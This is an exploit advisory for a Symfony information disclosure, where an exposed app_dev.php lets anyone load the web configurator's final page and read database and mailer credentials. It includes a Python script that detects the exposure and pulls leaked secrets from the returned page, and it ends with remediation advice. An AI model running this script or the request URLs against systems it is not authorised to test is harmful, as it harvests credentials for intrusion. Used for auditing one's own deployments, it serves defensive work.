Symfony (Standard Edition) versions prior to 2.7.13 are reported to suffer from a remote information disclosure vulnerability when the app_dev.php development front controller is reachable: the bundled web configurator's final step renders app/config/parameters.yml, leaking the database host, user and password.
# Exploit Title: Symfony < 2.7.13 - Remote Information Disclosure
# Google Dork: N/A
# Date: 6/27/2018
# Exploit Author: Abdeljalil Nouiri (pwny)
# Author Mail : abdel001nouiri[at]gmail[dot]com
# Vendor Homepage: https://www.symfony.com/
# Version: 2.7.13
# Tested on: Win10 x64, Ubuntu
# Exploit :
-STEP 1:
The issue is only reachable when the development front controller (app_dev.php) has not been removed or access-restricted. Request it and confirm the application answers instead of returning "403 Forbidden":
url : https://localhost/app_dev.php/
Note: the stock web/app_dev.php shipped with Symfony Standard Edition rejects any client that is not on a loopback address (127.0.0.1 / ::1) with HTTP 403, so an app_dev.php that answers remote requests means that guard was removed or the dev controller was deployed to production.
-STEP 2:
The last step of the web configurator (provided by SensioDistributionBundle, which AppKernel registers only in the dev environment) is still accessible. That page renders the contents of app/config/parameters.yml, which leaks the database host, user and password among the other configured parameters:
url : https://localhost/app_dev.php/_configurator/final
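As an added example, not part of the original advisory, the script below turns the two steps above into a check an operator or tester can run against their own host: it classifies the response to /app_dev.php/ (stock 403 guard in place, controller absent, or exposed) and, only if the dev controller is exposed, requests the configurator's final step and pulls any sensitive parameters.yml keys out of the returned page. The target URL, the User-Agent string and the two embedded sample responses used for the offline self-test are constructed/assumed, not captured from a real system.

```python
# Added example (not part of the original advisory). The hostname, User-Agent
# and the SAMPLE_* bodies below are constructed stand-ins, not real captures.
import re
import urllib.error
import urllib.request

DEV_CONTROLLER = "/app_dev.php/"
CONFIGURATOR_FINAL = "/app_dev.php/_configurator/final"

# Keys from Symfony Standard Edition's app/config/parameters.yml whose values
# must never reach an unauthenticated client.
SENSITIVE_KEYS = frozenset({
    "database_host", "database_port", "database_name", "database_user",
    "database_password", "mailer_host", "mailer_user", "mailer_password", "secret",
})

# One "key: value" YAML line. HTML tag lines never match because '<' is not a
# word character, and a bare "parameters:" section header has no value.
PARAM_LINE = re.compile(r"^[ \t]*([A-Za-z_][\w.]*):[ \t]*(\S.*?)[ \t]*$", re.MULTILINE)


def classify_dev_controller(status, body):
    """Decide what a GET of /app_dev.php/ tells us: blocked, absent, exposed or unknown."""
    if status == 403 and "not allowed to access this file" in body:
        return "blocked"   # stock loopback-only guard in web/app_dev.php is in place
    if status == 404:
        return "absent"    # dev front controller not deployed
    if status in (200, 301, 302):
        return "exposed"   # the dev kernel is answering remote requests
    return "unknown"


def extract_leaked_parameters(body):
    """Collect sensitive parameters.yml entries echoed in the configurator's final page."""
    leaked = {}
    for key, value in PARAM_LINE.findall(body):
        if key in SENSITIVE_KEYS:
            leaked[key] = value.strip("'\"")
    return leaked


def fetch(url, timeout=10):
    """GET url and return (status, body); HTTP error responses are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "symfony-devcheck/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read().decode("utf-8", "replace")


def check_host(base_url, fetcher=fetch):
    """Run step 1 and, only if it succeeds, step 2 against base_url.

    fetcher is injectable so the logic can be exercised against canned responses.
    """
    base_url = base_url.rstrip("/")
    status, body = fetcher(base_url + DEV_CONTROLLER)
    result = {"dev_controller": classify_dev_controller(status, body), "leaked": {}}
    if result["dev_controller"] != "exposed":
        return result  # the configurator route sits behind the same front controller
    status, body = fetcher(base_url + CONFIGURATOR_FINAL)
    if status == 200:
        result["leaked"] = extract_leaked_parameters(body)
    return result


# Constructed stand-ins for the two responses, used by demo() and the self-test.
SAMPLE_BLOCKED = ("You are not allowed to access this file. "
                  "Check app_dev.php for more information.")
SAMPLE_FINAL_PAGE = """<html><body>
<h1>Your distribution is configured!</h1>
<p>Your parameters.yml file has been overwritten with these parameters:</p>
<textarea readonly="readonly">
parameters:
    database_host: 127.0.0.1
    database_port: ~
    database_name: symfony
    database_user: app
    database_password: 's3cr3t'
    mailer_transport: smtp
    secret: ThisTokenIsNotSoSecretChangeIt
</textarea>
</body></html>"""


def demo():
    """Exercise check_host against the constructed responses (no network needed)."""
    canned = {
        "https://localhost/app_dev.php/": (200, "<html>dev toolbar</html>"),
        "https://localhost/app_dev.php/_configurator/final": (200, SAMPLE_FINAL_PAGE),
    }
    return check_host("https://localhost", fetcher=lambda url: canned[url])


if __name__ == "__main__":
    import sys
    print(check_host(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

Run it with a base URL (e.g. `python devcheck.py https://host`) to test a real deployment, or with no argument to see the offline demo. A "blocked" result means the default app_dev.php guard is doing its job; "exposed" together with a non-empty `leaked` dict is the condition the advisory describes, and the remediation is to delete app_dev.php from the production document root (and the configurator bundle with it) rather than to rely on the guard.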
# POC :
http://prntscr.com/kbuua8